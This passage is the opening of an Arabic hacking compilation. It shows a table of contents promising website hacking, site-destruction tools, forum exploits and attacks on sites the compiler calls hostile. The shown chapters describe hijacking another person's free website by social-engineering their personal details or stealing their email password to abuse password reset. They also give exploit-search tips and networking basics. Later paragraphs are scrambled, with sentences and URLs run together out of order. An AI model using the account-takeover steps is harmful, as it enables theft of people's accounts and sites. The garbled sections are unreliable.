You are on page 1of 330

‫لمحتويات‬

‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬
‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬
‫‪.12‬‬
‫‪.13‬‬
‫‪.14‬‬
‫‪.15‬‬
‫‪.16‬‬
‫‪.17‬‬
‫‪.18‬‬
‫‪.19‬‬
‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬

‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬

‫‪.20‬‬
‫‪.21‬‬
‫‪.22‬‬
‫‪.23‬‬
‫‪.24‬‬
‫‪.25‬‬
‫‪.26‬‬
‫‪.27‬‬
‫‪.28‬‬
‫‪.29‬‬
‫‪.30‬‬
‫‪.31‬‬
‫‪.32‬‬
‫‪.33‬‬
‫‪.34‬‬
‫‪.35‬‬
‫‪.36‬‬
‫‪.37‬‬

‫المقدمة‪.‬‬
‫الفهرس‪.‬‬
‫مقدمة عامة عن الهاكر‪.‬‬
‫كيفية البحث في النترنت‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الول(‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الثاني(‪.‬‬
‫المن عبر النترنت‪.‬‬
‫أمن الشبكات‪.‬‬
‫مصطلحات مهمة للمبتدئين في اختراق المواقع‪.‬‬
‫اختراق المواقع للمبتدئين‪.‬‬
‫الختراق ببرنامج ‪Webcrack.‬‬
‫الختراق ببرنامج ‪MungaBunga.‬‬
‫برنامج تدمير المواقع ‪.WinSmurf‬‬
‫شرح برنامج ‪ Evil Ping‬لتدمير المواقع‪.‬‬
‫برنامج الدرة لتدمير المواقع‪.‬‬
‫تدمير المواقع بدون برامج‪.‬‬
‫التلنت‪.‬‬
‫معلومات عن ‪.DNS‬‬
‫معلومات عن ‪.Routing in the Internet‬‬
‫‪.NETBIOS‬‬
‫بروتوكول خدمة ‪.Finger‬‬
‫‪ Net‬شرح مختصر لدارة الشبكة بإستخدام المر‪.‬‬
‫شرح الـ‪secure shell.‬‬
‫شرح معنى الـ ‪Buffer Overflows.‬‬
‫الـ ‪ CGI‬وعلقتها بالنترنت‪.‬‬
‫كيف تحمي نفسك وتخفي أفعالك؟!‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الثاني(؟؟‪.‬‬
‫برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!ً!‪.‬‬
‫شرح برنامج ‪NeoTrace.‬‬
‫كيفية القيام بجمع المعلومات عن موقع أو شبكة‪.‬‬
‫برنامج عمران سكان للبحث عن الثغرات‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الول(‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الثاني(‪.‬‬
‫معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود‪.‬‬
‫الدليل الكامل لختراق سيرفر ‪.IIS‬‬
‫دراسة مفصلة وبعمق في الـ ‪UniCode.‬‬
‫تدريب على عملية الختراق بواسطة اليونيكود‪.‬‬
‫شرح مفصل لكيفية اختراق المواقع المجانية‪.‬‬
‫درس مفصل عن الكوكيز‪.‬‬
‫شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات‪.‬‬
‫وداعًا للبرنامج السطورة ومرحبا ببرنامج ‪.NOOP4‬‬
‫معلومات مهمة عن المواقع التي تدعم الفرونت بيج‪.‬‬
‫اختراق المواقع التي تدعم الفرونت بيج‪.‬‬
‫الختراق العشوائي‪.‬‬
‫الطريقة الصحيحة والمثلى في اختراق المواقع‪.‬‬
‫نبذه يسيرة ومبسطة عن كيفية اختراق المواقع‪.‬‬
‫)>س&ج<( في اختراق المواقع للمبتدئين‪.‬‬

‫‪1‬‬

‫‪.38‬‬
‫‪.39‬‬
‫‪.40‬‬
‫‪.41‬‬
‫‪.42‬‬
‫‪.43‬‬
‫‪.44‬‬
‫‪.45‬‬
‫‪.46‬‬
‫‪.47‬‬
‫‪.48‬‬
‫‪.49‬‬
‫‪.50‬‬
‫‪.51‬‬
‫‪.52‬‬
‫‪.53‬‬
‫‪.54‬‬
‫‪.55‬‬
‫‪.56‬‬
‫‪.57‬‬
‫‪.58‬‬
‫‪.59‬‬
‫‪.60‬‬
‫‪.61‬‬
‫‪.62‬‬
‫‪.63‬‬
‫‪.64‬‬
‫‪.65‬‬
‫‪.66‬‬
‫‪.67‬‬
‫‪.68‬‬
‫‪.69‬‬
‫‪.70‬‬
‫‪.71‬‬
‫‪.72‬‬
‫‪.73‬‬
‫‪.74‬‬
‫‪.75‬‬
‫‪.76‬‬
‫‪.77‬‬

‫برنامج ‪ CgiScaner‬للبحث عن الثغرات‪.‬‬
‫شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع‪.‬‬
‫شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع‪.‬‬
‫اماكن وجود ملف الباسورد في أنظمة التشغيل‪.‬‬
‫اختراق الموقع )الجزء الول(‪.‬‬
‫اختراق المواقع )الجزء الثاني(‪.‬‬
‫اختراق المواقع )الجزء الثالث(‪.‬‬
‫درس في اختراق المواقع )متوسط(‪.‬‬
‫شرح ملف ‪.htaccess‬‬
‫نظام نقل الملفات ‪FTP.‬‬
‫الختراق عن طريق ‪FTP.‬‬
‫اختراق الـ ‪.SQL‬‬
‫درس مفصل عن الـ‪SQL.‬‬
‫درس لحتراف الهاك في اختراق المواقع‪.‬‬
‫استغلل لينكس في اختراق المواقع‪.‬‬
‫درس اخر في اختراق المواقع عن طريق لينكس‪.‬‬
‫شرح مفصل من اللف إلى الياء في احتراف اختراق المواقع عن طريق لينكس‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الول(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثاني(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثالث(‪.‬‬
‫شرح أداة ‪.anmap‬‬
‫طريقة لقتحام السيرفرات بدون ثغرات‪.‬‬
‫‪.Cross Site Scripting‬‬
‫كود تدمير سجل الزوار‪.‬‬
‫وضع فايروس في صفحة‪.‬‬
‫الثغرااات‪.‬‬
‫شرح شبه مفصل عن الثغرات‪.‬‬
‫كيف تستخدم الثغرات‪.‬‬
‫تمتع بإختراق المواقع السرائيلية مع هذه الثغرة‪.‬‬
‫ثغرة نيوك‪.‬‬
‫ثغرة ‪.Chunked‬‬
‫حماية المنتديات‪.‬‬
‫اختراق المنتديات من نوع ‪.vBulletin2,2,0‬‬
‫درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها‪.‬‬
‫ثغرة في منتديات ‪.vBulletin 2,2,9‬‬
‫اختراق منتديات ‪.phpbb 2.0.0‬‬
‫ثغرة في ‪. php nuke‬‬
‫أفضل المنتديات والمواقع العربية للهاك‪.‬‬
‫أفضل مواقع المن والهاك النجليزية‪.‬‬
‫الخاتمة‪.‬‬

‫‪2‬‬

‫بسم الله الرحمن الرحيم‬
‫الحمد لله رب العالمين الرحمن الرحيم والصلة والسلم على أشرف‬
‫النبياء‬
‫والمرسلين نبينا محمد عليه أفضل الصلة وأتم التسليم‪،‬‬
‫أما بعد‪...‬‬
‫ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون‬
‫مرجعا ً لخواني وأخواتي المسلمين‪ ،‬ففي هذا الكتاب سأقوم بنقل كل ما‬
‫كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية‬
‫الختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف‪،،،‬‬
‫وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب‪.‬‬
‫ملحظة‪ :‬مواضيع هذا الكتاب ليس من تأليفي إنما هي نقل ً عن اخواني‬
‫المسلمين‪.‬‬
‫اقرأ هذا اول ً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي‬
‫العظيم‬
‫الذي رفع السماء بل عمد أل اقوم بتطبيق ما في هذا الكتاب من طرق‬
‫على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"‬
‫والله الموفق‪،،،‬‬

‫‪3‬‬

‫"من هم الهاكر "‬
‫الهكرز هم اشخاص مخترقون لجهزة الغير بمساعدة احدى برامج الختراق المشهورة إعتماًد على برامج‬
‫‪.‬مساندة تسهل عملية التصال بين الحاسبين تسمى بالباتش اوالسيرفر‬

‫كيف يتم اختراق مواقع النترنت؟؟‬‫هذا السؤال الذي دفع الكثيرين الي البحث والبحار في عالم النت‬
‫هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية‬
‫النوع الول‬
‫سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية‬
‫السرية التي ل يعلمها ال انت مثل‬
‫اسمك الحقيقي الكامل‬
‫عمرك وميلدك‬
‫من اي بلد انت‬
‫وتختلف الدقة من سيرفر الي سيرفر آخر‬
‫النوع الثاني‬
‫سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب‬
‫عليه‬
‫))نسيت الباسوورد((‬
‫ومن ثم يرسلون الباسوورد الي اليميل الخاص بك‬
‫‪...................................................................‬‬
‫هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما‬
‫ان تعرف بياناته‬
‫الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال‬
‫البايانات الخاصة‬
‫‪ ...‬ومن ثم تغيير الباسوورد‬
‫وتغيير بيانات صاحب الصفحة الخاصة والسرية‬
‫‪..........................‬‬
‫النوع الثاني‬
‫هذا النوع مهما حاولت سرقة الباسوورد فانك لتستطيع ان تمتلك الصفحة لمدة طويلة لن الشركة سوف‬
‫ترسل اليه الباسوورد‬
‫‪ ..‬الجديد ‪ ..‬ومن هنا سيعرف الباسوورد ورقمه الجديد‬
‫!!! وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري‬
‫(( اذا كيف الحل ؟؟‬
‫‪ ..‬الحل هو‬
‫ان تعرف باسوورد اليميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت‬
‫الباسوورد للموقع‬
‫‪ ..‬فسيتم اخطارك علي اليميل الذي سرقته ‪ ..‬بالباسوورد للموقع‬
‫‪.‬ومن هنا يمكنك سرقتة وملكيته وانت بسلم‬
‫‪،،،‬انتهى‬

‫‪4‬‬

‫"كيفية البحث في النترنت"‬

‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة <‬
‫> ةةةةةة‪ :‬ةةةة ةةةة <‬
‫كيفية البحث في النترنت ؟‬
‫عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في النترنت ونريد البحث عنها كيف يتم ذلك ؟؟‬
‫غالبا نجد ان الشباب ل يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في النترنت ؟ وقد‬
‫تجده يبحث ولكن ل يحصل بنتيجه والخطأ ليس في البحث‬
‫بل في طريقة البحث‬
‫صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان‬
‫محركات البحث لكل منها عمل مع العلم انها عامه ولكن‬
‫ما هي النتائج ؟؟‬
‫بالنسبه مثل للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الولى وهي غالبا‬
‫التي تريدها‬
‫بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد‬
‫والتي يتعامل معها المحرك ثم المواقع التجاريه التي ل يتعامل‬
‫معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا‬
‫اعتقد ان المسئله وضحت‬
‫يا اخوان انا ابغى ابحث عن برنامج ما مثل يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل‬
‫لزم انت تتعلم كيف تبحث‬
‫وش الفرق بينك وبين النسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ل اعتقد‬
‫ذلك‬
‫هل النترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ل اعتقد ذلك مع العلم ان السرعات العاليه اثبتت‬
‫فشلها بالنسبه لبعض الشخاص‬
‫التي ل تعرف كيف توظف عقولها‬
‫كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وال يا اخ بلك‬
‫انا الن لي سنه كامله على النترنت‬
‫غير محدد بباندويث وبسرعة ‪ 256‬ول اعرف من برامج الختراق غير الهاك اتاك ‪ ISDN‬مع خط‬
‫فعل انا تحطمت سنه كامله ومعك القوه الضاربه هذه ول تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين‬
‫مواقع الغاني والفلم والداون لود لها والشات قال ايوال هذا هو انا‬
‫وبذلك فعل ايقنت ان السرعه ليست كل شيء‬
‫‪.‬اهم شي عقلية من يملك السرعه فالسلح الذي ل تستطيع استخدامه ‪ -‬ل ينفع ‪ - (:‬ا هـ‬
‫‪ :‬الن سنقوم بشرح كيفية التخطيط للبحث‬
‫طريقه بسيطه جدا وهي عبر تقسيم المواقع‬
‫مواقع تجاريه‬
‫‪5‬‬

‫)) مواقع برامج )) ويندوز ‪ -‬ليونكس‬
‫مواقع ملتيميديا‬
‫مواقع سياسيه واخباريه‬
‫مواقع هاك‬
‫مواقع كراك‬
‫مواقع سكيوريتي‬
‫مواقع هاردوير‬
‫منتديات‬
‫)) محرك بحث جوجل )) هذا لوحده عالم‬
‫مواقع ‪ .....‬الخ‬
‫الن لنأخذ ما نبحث عنه‬
‫مثل برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثل في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟‬
‫او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟‬
‫خلص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت ‪ -‬ويب اتاك ‪ -‬داون لود ‪ -‬وغيرها‬
‫وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز‬
‫)) وهو موقع فريش ميت )) اخر الموضوع ساضع كل تلك المواقع كمرجع‬
‫بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ل لم ينتهي بعد اذهب الى الجوجل وابحث عن‬
‫ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه‬
‫واذا وجدت ما تريد ادخل اليها‬
‫لم تجد ؟؟ )) ما اعتقد انك ما هتلقي اللي تدور عليه انا عمري ما سويت هالطريقه ال واجد ما اريد (( ولكن‬
‫لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث‬
‫قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى‬
‫هذه نقطه نقطة اخرى مثل انت منت عارف اللي انت تبحث عنه بالظبط‬
‫مثل انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش‬
‫‪ CSS‬او ‪ XSS‬واللي اختصارها ‪ Cross Site Scripte‬ولتكن مثل ثغرات الـ‬
‫انا ما ادور على الثغره ادور على اكسبلويت مثل وش اسوي ؟؟؟‬
‫هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس ‪ XSS‬اذهب اول لمواقع السكيوريتي ابحث عن كلمة‬
‫الوقت اذهب الى الجوجل مثل وابحث عن‬
‫ولكن هذا ل يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ل ‪XSS‬‬
‫) ‪ ( +‬الجوجل هيجيب بلوي ولذلك علي بتحديد البحث عبر علمه‬
‫‪ :‬يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب‬
‫‪XSS+BUG+EXPLOIT‬‬
‫‪ :‬هاكتب ‪ IIS‬مثل ادور ثغرات‬
‫‪IIS+exploit+bug‬‬
‫خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه‬
‫ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد‬
‫اهم شي بالنقطه التخطيط للبحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز وال ليونكس ؟ رتب المواقع ‪ :‬ابدا البحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع ‪ :‬ابدا البحث‬

‫‪6‬‬

uk/hi/arabic/news http://arabic.bbc.http://www.com/ .google.ussrback.securityfocus.http://www.co.http://drivers.com/ .nz/ .ntsecurity.cnn.‫وهكذا‬ ‫الن ساضع لكم مجموعه من المواقع تفيدكم جدا‬ ‫ الملك جوجل‬: http://www.com/ .yahoo.http://www.lycos.com/ .com/ .com/ .http://www.http://intel.com/ ‫ )) عبر برامجها مثثل الكازا او المورفيس او اوديو جالكسي او وين ام اس‬: ‫ )) مواقع ملتيميديا‬kazaa WinMX ‫الكثر شهره‬ ‫ مواقع سياسيه واخباريه‬: http://news.http://www.com/ ‫انتهى‬،،، 7 .nu/ http://www.http://www.com/ .ntsecurity.online.com/ .ntbugtraq.com/ .com/ http://www.amdmb.com/ http://www.com/ ‫ محركات بحث عاديه ومتقدمه‬: http://www.net/ ‫ مواقع سكيوريتي‬: http://www.http://www.securiteam.altavista.lycos.aljazeera.net.asus.com/ ‫ مواقع هاردوير‬: http://nvidia.http://hotbot.

‬ولكن على الرغم من كثرة الشياء المفيدة في النترنت إل أنه لبد من وجود ما يكدر‬ ‫الصفو‪ .‫")مفاهيم خاصة بشبكات النترنت )الجزء الول"‬ ‫>ةةةةة <‬ ‫> ةةةةةة‪ :‬ةةةة ةةةةةة <‬ ‫النترنت عالم مليء بالفائدة‪ ،‬مليء بالمتعة‪ ،‬عالم يجد فيه كل إنسان ما يهمه‪ ،‬باختلف مجالت الهتمام‬ ‫واختلف الشخاص‪ .‬‬ ‫مقدمة‪:‬‬ ‫هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الساسية التي يجب أن يعرفها كل من يريد‬ ‫اتقاء شر الهاكرز‪ ،‬وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اللي‪.winipcfg‬إذا كنت تستخدم وندوز باعتماد اللغة العربية اختر‬ ‫"ابدأ" ثم "تشغيل" ثم اكتب ‪.40.‬‬ ‫الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ‪ ،‬كوسيلة تعليمية لكل المستخدمين على مختلف‬ ‫مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز للحاق‬ ‫الذى بهم‪ ..‬‬ ‫من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ل بد أنها دارت في رأس أكثر المستخدمين‬ ‫في مختلف أنحاء العالم‪ ،‬ول سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من‬ ‫أجهزتهم أو إتلف محتوياتها أو في أهون الحوال إخافتهم وإرعابهم‪.winipcfg‬‬ ‫توزيع أرقام الـ ‪IP‬‬ ‫هل سبق وأن تساءلت لماذا كان رقم ‪ IP‬الخاص بك هو ‪ 212.5.‬‬ ‫لعلك الن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالنترنت؟ المر سهل جدا من شريط المهام في‬ ‫الوندوز انقر على ‪ Start‬ثم ‪ run‬ثم أدخل ‪ .‬‬ ‫نفس المبدأ ينطبق في مجال الحاسب اللي من ناحية الشبكات‪ ،‬فلتمييز الجهزة المرتبطة بشبكة واحدة يعطى‬ ‫لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان‬ ‫الجهاز أو ‪.‬فالرقم الموجود على‬ ‫بطاقتك يستحيل تكراره لي مواطن آخر في نفس البلد‪.‬ويوجد لكل منظمة قاعدة‬ ‫‪8‬‬ .1‬وليس ‪ ،24.‬بل ستكون‬ ‫الهاكر الطيب‪.‬‬ ‫رقم ‪IP‬‬ ‫ما الغرض من بطاقة الحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك‪ .66.‬مالم يتم نزع الجهاز من الشبكة بشكل دائم‪ ،‬ولكن في حالة التصال الهاتفي فإن عنوان الجهاز‬ ‫يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلله‪.‬باختصار ستكون أخي القارئ أحد هؤلء الهاكرز‪ ،‬ولكن لن تكون مثلهم في الشر‪.‬‬ ‫تشرف منظمة ‪ (IANA(Internet Assigned Numbers Authority‬على توزيع أرقام ‪ IP‬على‬ ‫مستوى العالم‪ ،‬حيث أنها تقوم بالشراف على ثلث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء‬ ‫معين من العالم وهذه المنظمات الفرعية هي‪:‬‬ ‫‪ -1‬منظمة ‪ (ARIN (American Registry for Internet Numbers‬وتشرف على أمريكا‬ ‫الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا‬ ‫‪ -2‬منظمة ‪ (RIPE (Réseaux IP Européens‬وتشرف على منطقة أوروبا والشرق الوسط وأجزاء‬ ‫من افريقيا‬ ‫‪ -3‬منظمة ‪ (APNIC (Asia Pasific Network Information Center‬وتشرف على آسيا‬ ‫تقوم كل منظمة بالشراف على توزيع ارقام ‪ IP‬للدول الواقعة تحت مجال اشرافها‪ .IP‬‬ ‫في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلك الشبكة‪ ،‬يكون هذا الرقم ثابتا‬ ‫للجهاز دائما‪ .33.3‬وهل سبق‬ ‫وأنت تساءلت لماذا تبدأ ارقام الـ ‪ IP‬في السعودية بالرقم ‪ 212‬وليس بأي رقم آخر ؟ في الحقيقة إن أرقام‬ ‫‪ IP‬ليتم توزيعها بطريقة عشوائية أو بطريقة "كٌل يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف‬ ‫على توزيع أرقام ‪ IP‬على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم ‪ IP‬الذي‬ ‫تمتلكه‪.‬هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الحيان‪.

ripe.ripe.html‬وأدخل رقم‬ ‫‪ IP‬وستحصل على معلومات متكاملة عن صاحب هذا الرقم‪.‫بيانات تمكنك من معرفة صاحب رقم ‪ IP‬معين وتسمى هذه الخدمة بخدمة ‪ whois‬حيث تقوم بإدخال رقم ‪IP‬‬ ‫التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا ‪ IP‬فمثل لمعرفة صاحب رقم ‪ IP‬معين في‬ ‫المملكة العربية السعودية قم بالذهاب للموقع ‪ http://www.1‬كل قسم من هذه القسام يمكن أن‬ ‫تكون له قيمة تتراوح بين ‪ 0‬و ‪) 255‬مع وجود بعض الستثناءات التي ليس هذا المجال لذكرها( الشيء‬ ‫الذي يجب معرفته أن أول ثلثة أقسام من الجهة اليسرى من رقم ‪ IP‬غالبا ما تكون محجوزة لمزود خدمة‬ ‫معين بحيث تكون جميع أرقام ال ‪ IP‬التي يتشابه بها أول ثلثة أقسام من الجهة اليسرى تنتمي لنفس مزود‬ ‫الخدمة‪ .‬فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف‬ ‫يعرف الجهاز لي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها‪.‬‬ ‫فكل تطبيق لديه منفذ معين يستخدمه لرسال واستقبال بياناته وهذا نوع من التنظيم فمثل خدمة الويب غالبا‬ ‫ما تكون على المنفذ ‪ 80‬وخدمة الملفات تكون على المنفذ ‪ 21‬وبرنامج النت ميتنغ يكون على عدة منافذ‬ ‫منها ‪ 1720‬وكل تطبيق يكون له منفذ معين‪ .10.75.‬فمثل الجهاز الذي يحمل رقم ‪ IP 212.‬‬ ‫ولمعرفة مزود الخدمة بواسطة رقم ‪ IP‬الثلثي )أي رقم ‪ IP‬بدون آخر رقم من الجهة اليمنى ( يمكنك زيارة‬ ‫موقع المنظمة المشرفة على البلد الذي ينتمي له رقم ‪ IP‬واستخدام خدمة ‪ whois‬الخاصة بها‪ .‬‬ ‫المنفذ ‪Port‬‬ ‫ماهو المنفذ ؟ تخيل منزل فيه العديد من البواب وأن كل واحد من هذه البواب مخصص لخدمة معينة ‪ ،‬فباب‬ ‫لستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات‪.net/db/whois.‬نفس المبدأ ينطبق على الحاسب اللي فالجهاز‬ ‫يحتوي على العديد من الخدمات مثل خادم الويب ‪ web server‬وخادم الملفات ‪ ftp server‬وغيرها‪.26.34‬والجهاز الذي يحمل رقم ‪IP‬‬ ‫‪ 212.26.html‬‬ ‫وأدخل الرقم ‪ 212.26.75‬في المربع الموجود في الصفحة ومن ثم انقر الزر ‪ search‬وستحصل على‬ ‫جميع المعلومات المخزنة عن مزود الخدمة‪.201‬غالبا ما ينتميان لنفس مزود الخدمة‪.‬‬ ‫عائلة الـ ‪IP‬‬ ‫من المعروف أن رقم الـ ‪ IP‬يتكون من أربعة أقسام كالتالي ‪ 10.‬فمثل‪،‬‬ ‫لمعرفة مزود الخدمة في المثال أعله قم بالذهاب للموقع ‪http://www.‬‬ ‫‪ DNS‬ماهو ؟‬ ‫أنت بالطبع تتذكر أسماء أصدقائك ول تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام‬ ‫‪9‬‬ .10.net/db/whois.75.

‬‬ ‫هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف‬ ‫عنوانك لكي يقوم بالرد عليك‪ .145.111.‬من هذا المبدأ جاءت فكرة‬ ‫‪ .com‬يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها‬ ‫لخادم السماء ‪ DNS‬والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم‬ ‫الويب الخاص بشبكة سي ان ان‪ .com‬ومن ثم لحظ‬ ‫خبراء الحاسب أن ذلك سيكون صعبا جدا ‪ .1‬في حالة كون الشخص‬ ‫مشرفا على الغرفة التي‬ ‫‪10‬‬ .53..cnn.DNS‬حيث أنه في بداية استخدام النترنت كان من المفروض أن تحفظ عنوان الجهاز ‪ IP‬لكل موقع ‪..cnn.10‬بدل من ‪ www.222.‬اختصارا‪ ،‬يمكن القول بأن خادم السماء ‪ DNS‬ماهو ال جهاز يحتوي‬ ‫على قاعدة بيانات فيها اسماء الجهزة في النترنت وأرقام ‪ IP‬الخاصة بها‪.server‬‬ ‫هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الجهزة المتصلة بجهازك ) أو التي يقوم جهازك بارسال‬ ‫واستقبال البيانات منها( ومعرفة المتفذ )‪ (port‬الذي تم عليه التصال) فائدة المنفذ هي تحديد التطبيق الذي‬ ‫تم التصال عليه( وهذا المر هو المر ‪ netstat‬ما عليك إل أن تقوم بتشغيل ‪ ms-dos prompt‬من‬ ‫قائمة برامج ‪ programs‬ومن ثم اكتب هذا المر وستحصل على قائمة بكل هذه الجهزة مع المنفذ الذي تم‬ ‫عليه التصال في كل الجهازين‪.‬‬ ‫المحادثة )‪IRC) Internet Relay Chat‬‬ ‫طريقة عمل نظام المحادثة هي وجود مزود محادثة ‪ chat server‬ووجود برنامج محادثة ‪chat client‬‬ ‫في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ‪ ،‬والذي بدوره يقوم‬ ‫بالتصال بمزود المحادثة‪ ..333‬وهذا فيه نوع من الحماية للمستخدمين حتى ل يتمكن الهاكرز من‬ ‫معرفة رقم الـ ‪ IP‬الكامل‬ ‫للمستخدم ومن ثم‬ ‫استخدامه للوصول إليه‪.‬وهما‬ ‫كالتالي‪:‬‬ ‫‪ .‬بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها‪ .connection‬طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب التصال‬ ‫ويسمى عميل أو ‪ Client‬ويكون هناك أيضا من يتم التصال عليه ويسمى مزود ‪.‬‬ ‫المر ‪netstat‬‬ ‫هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في النترنت بدون أن‬ ‫يكون لدى كل من الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات‪.‫هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها‬ ‫وإن فعلت فتبقى الحقيقة أن نسيان الرقام أكثر سهولة من نسيان السماء‪ .‬في نظام الشبكات يسمى‬ ‫هذا التخاطب بالتصال ‪ .‬فالذاكرة البشرية غير قادرة على حفظ الكثير من الرقام ومن هنا‬ ‫تم التوجه للـ ‪ DNS‬وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الجهزة وأرقام ‪IP‬‬ ‫الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود ‪ DNS‬ليرد عليهم بعنوانه )رقم ‪IP‬‬ ‫الخاص به( فلتدخل على موقع ‪ www.‬‬ ‫قلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـ ‪ IP‬الخاص 